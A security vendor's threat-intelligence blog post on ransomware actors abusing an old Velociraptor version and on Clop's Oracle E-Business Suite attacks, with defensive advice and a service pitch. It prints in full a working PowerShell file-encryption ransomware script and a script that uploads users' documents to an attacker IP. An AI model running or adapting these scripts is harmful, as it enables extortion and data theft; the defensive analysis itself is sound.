CVE-2025-6264 (CVSS N/A) Velociraptor Misuse in Ransomware Attacks

Estimated reading time: 10 minutes

Key takeaways:

  • Ransomware operators are exploiting legitimate DFIR tools like Velociraptor.
  • Attackers used an outdated, vulnerable version of Velociraptor to deploy LockBit and Babuk ransomware.
  • The activity is attributed to the group Storm-2603, a suspected China-based threat actor.
  • Clop ransomware group is actively targeting Oracle E-Business Suite customers, exploiting a zero-day vulnerability.
  • PurpleOps offers services to help organizations defend against sophisticated cyber threats.

Table of Contents:

Recent findings indicate a concerning trend: ransomware operators are increasingly exploiting legitimate digital forensics and incident response (DFIR) tools like Velociraptor to enhance their attacks. This blog post examines this development, focusing on a specific instance where Velociraptor, combined with other tools and techniques, facilitated a complex ransomware campaign. We will discuss the implications of this trend and provide actionable insights for bolstering your organization’s defenses, including how PurpleOps can assist in mitigating these types of threats.

Velociraptor Leveraged in Ransomware Attacks: A Detailed Look

Cisco Talos recently reported on a ransomware attack in August 2025 where threat actors leveraged Velociraptor, an open-source DFIR tool, to maintain persistent and stealthy access while deploying LockBit and Babuk ransomware. Velociraptor is a powerful tool designed to enable security teams to monitor endpoints by deploying client agents across Windows, Linux, and Mac systems, continuously collecting data and responding to security events. In this instance, however, the tool was turned against the victim.

The attackers installed an outdated version of Velociraptor (version 0.73.4.0), which was vulnerable to CVE-2025-6264, a privilege escalation vulnerability that allowed arbitrary command execution and complete endpoint takeover. This is not the first time Velociraptor has been reportedly misused. There are earlier reports of Velociraptor being used to download and execute Visual Studio Code, likely to create a tunnel to an attacker-controlled command-and-control (C2) server.

This trend aligns with findings from Talos’ 2024 Year in Review, which states that threat actors are leveraging a wider variety of commercial and open-source tools.

Attribution to Storm-2603

Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell.

Storm-2603 is known for deploying Warlock ransomware and LockBit ransomware in the same engagement. While LockBit is widely deployed by a variety of ransomware actors, Warlock was first advertised in June 2025 and has since been heavily used by Storm-2603. The use of two different ransomware variants in the same attack also supports the connection to Storm-2603.

The threat actor in this engagement also mirrored several Storm-2603 TTPs:

  • Use of cmd.exe and batch scripts
  • Disabling Microsoft Defender protections
  • Creating scheduled tasks
  • Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies
  • Modifying Group Policy Objects (GPOs)

The actors likely gained initial access through ToolShell exploitation, though this could not be confirmed due to limited access to the victim organization’s data.

Campaign Overview

Suspicious activity began in mid-August 2025, with attempts to escalate privileges and move laterally. The threat actor created admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller and accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs).

The threat actor installed an older, vulnerable version of Velociraptor on multiple servers to maintain persistence. They also executed Smbexec, a Python script that allows remote program execution using the SMB protocol.

To impair defenses, the actors modified Active Directory (AD) GPOs to:

  • Disable real-time protection
  • Disable behavior monitoring
  • Disable monitoring of file and program activity

A fileless Powershell script with encryption functionality was deployed, believed to be the primary encryptor for Windows machines.

function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2/7/o4pMjgg4S838jw6aiRbag/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j/IMa6GNpMkVjsNPjvB/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB/M+bHFwgYkUG4rS2s/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"}

Following the script deployment, ransomware executables identified as LockBit were observed on Windows machines, encrypting files with the Warlock extension “xlockxlock”. A Linux binary on ESXi servers, flagged as the Babuk encryptor, achieved partial encryption and appended files with “.babyk”. The use of Babuk ransomware has not been previously observed with Storm-2603.

The actors also exfiltrated data using a PowerShell script that suppressed visual indications of progress and included “start-sleep” cmdlets to inhibit analysis and evade detection.

function GR {$numbers = 1..20;$numbers | Get-Random }
function Upfile {
    param (
        [string]$path = "C:\Users\",
        [int]$maxConcurrentJobs = 40  #
    )
    Add-Type -AssemblyName System.Web
    try {
        $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |
                Where-Object { $_.Length -lt 50MB } |
                Select-Object -ExpandProperty FullName
        $uploadScriptBlock = {
            param ($file, $grValue)
            try {
                Add-Type -AssemblyName System.Web
                $fileName = Split-Path -Path $file -Leaf
                $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName)
                $uploadUrl = "http[:]//65.38.121[.]226/test/$encodedFileName"
                Write-Host "upload $file to $uploadUrl"
                $ProgressPreference = 'SilentlyContinue'
                $maxRetries = 3;$retryCount = 0
while ($retryCount -lt $maxRetries) {
            try {
$wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, "PUT", $file) | Out-Null
                Write-Host "upload Sucess $fileName"
                break
}
catch {
                $retryCount++
                Write-Host "upload $fileName retry $retryCount error: $_"
                Start-Sleep -Seconds 2
                }
                finally {$wc.Dispose()}}}
       catch
            {
                Write-Host "upload $fileName error: $_"
            }
            finally {$wc.Dispose()}

        }
        $grValue = GR
        $jobs = @()
        foreach ($file in $files) {
            while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100}
            $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue
        }
        $jobs | Wait-Job | ForEach-Object {
            Receive-Job -Job $_ -Keep
            Remove-Job -Job $_
        }
    } catch {
        Write-Host "getfile error: $_"
    }
}
$drives = @("C:\Users\", "D:\", "E:\", "F:\", "K:\")
foreach ($drive in $drives) {
    if (Test-Path $drive) {Upfile -Path $drive   }
    else {Write-Host "Drive $drive is not accessible." -ForegroundColor Yellow}
}

Clop Attacks Oracle E-Business Suite via Zero-Day Exploit

In related news, the Clop ransomware group has been actively targeting Oracle E-Business Suite customers, exploiting a zero-day vulnerability to steal significant amounts of data. Google Threat Intelligence Group (GTIG) and Mandiant reported that this activity began as early as August 9, 2025, with extortion emails sent to victim organizations on September 29, 2025. The critical zero-day vulnerability, CVE-2025-61882, was disclosed by Oracle on Saturday, two days after reporting extortion emails. The attack involved chaining at least five distinct defects, including the zero-day, to achieve pre-authenticated remote code execution.

The widespread attack spree actually involved at least five distinct defects, including the zero-day, that were chained together to achieve pre-authenticated remote code execution, watchTowr researchers said earlier this week.

Shadowserver scans found 576 potentially vulnerable instances of Oracle E-Business Suite on Oct. 6, with the majority of those IPs based in the United States. Clop’s ransom demands have reached up to $50 million.

Investigations into Clop’s activity underscore the stealthy nature of the threat group’s operations, including the use of multi-stage fileless malware designed to evade file-based detection. Other critical details remain unknown and cybercriminals from other groups have complicated analysis through unsubstantiated claims.

Mandiant said it observed artifacts on Oct. 3 that overlap with an exploit leaked in a Telegram group dubbed “Scattered LAPSUS$ Hunters.” Yet, Google hasn’t gathered enough evidence to definitively link the malicious July 2025 activity with this exploit.

Practical Takeaways

For Technical Readers:

  • Patch Management: Regularly update all software, including DFIR tools like Velociraptor and enterprise platforms like Oracle E-Business Suite. Pay close attention to security advisories and prioritize patching vulnerabilities promptly.
  • Vulnerability Scanning: Conduct regular vulnerability scans to identify outdated or vulnerable software versions within your environment.
  • Privilege Management: Implement strict privilege management policies to limit the ability of attackers to escalate privileges, disable security controls, and move laterally within the network.
  • Endpoint Detection and Response (EDR): Deploy and configure EDR solutions to detect and block malicious activity on endpoints, including the execution of unauthorized tools and scripts.
  • Monitor for Suspicious Activity: Implement monitoring and alerting for unusual activity, such as the execution of cmd.exe, PowerShell scripts, and modifications to Active Directory GPOs. Consider leveraging a cyber threat intelligence platform to identify emerging threats and tactics.
  • Network Segmentation: Segment your network to limit the impact of a potential breach and prevent attackers from moving laterally to other critical systems.
  • Review Tool Usage: Ensure that security tools are configured correctly and are actively monitored. Implement controls to prevent misuse of legitimate tools by unauthorized users.
  • Implement dark web monitoring service to identify any leaked credentials or early warnings of attacks targeting your infrastructure.

For Business Leaders:

  • Risk Assessment: Conduct a comprehensive risk assessment to identify potential vulnerabilities and weaknesses in your organization’s cybersecurity posture.
  • Cybersecurity Budget: Allocate sufficient resources to cybersecurity, including investments in security tools, training, and personnel.
  • Incident Response Plan: Develop and regularly test an incident response plan to ensure that your organization is prepared to respond to a ransomware attack or other security incident.
  • Employee Training: Provide cybersecurity awareness training to employees to educate them about the risks of phishing, social engineering, and other common attack vectors.
  • Supply Chain Risk Monitoring: Understand the cybersecurity posture of your vendors and suppliers, and ensure that they have adequate security controls in place.
  • Real-time ransomware intelligence integration into your security operations can significantly improve your ability to detect and respond to ransomware attacks.
  • Breach detection capabilities should be continuously tested and improved to identify and contain breaches as quickly as possible.

How PurpleOps Can Help

PurpleOps offers a suite of services designed to help organizations defend against sophisticated cyber threats, including ransomware attacks that leverage legitimate tools. Our expertise includes:

  • Cyber Threat Intelligence Platform: Leverage our platform for real-time insights into emerging threats, attacker tactics, and vulnerabilities. This includes comprehensive brand leak alerting and underground forum intelligence to proactively identify and mitigate risks.
  • Dark Web Monitoring: Our dark web monitoring service can identify compromised credentials and other sensitive information that could be used to launch an attack against your organization.
  • Supply Chain Information Security: We can assess the security posture of your vendors and suppliers to identify and mitigate supply chain risks.
  • Red Team Operations: Our red team operations simulate real-world attacks to identify weaknesses in your defenses and provide recommendations for improvement.
  • Penetration Testing: We conduct thorough penetration testing to identify vulnerabilities in your systems and applications before attackers can exploit them.

The increasing use of legitimate tools in ransomware attacks underscores the need for a proactive and comprehensive approach to cybersecurity. By implementing the practical takeaways outlined in this blog post and leveraging the expertise of PurpleOps, organizations can significantly reduce their risk of becoming a victim of these types of attacks.

Protect your organization from ransomware threats. Explore our range of services at PurpleOps Solutions or contact us at https://www.purple-ops.io/platform/ for a consultation.

FAQ

Q: What is Velociraptor?
A: Velociraptor is an open-source digital forensics and incident response (DFIR) tool.

Q: What is CVE-2025-6264?
A: CVE-2025-6264 is a privilege escalation vulnerability found in older versions of Velociraptor.

Q: Who is Storm-2603?
A: Storm-2603 is a suspected China-based threat actor known for deploying Warlock and LockBit ransomware.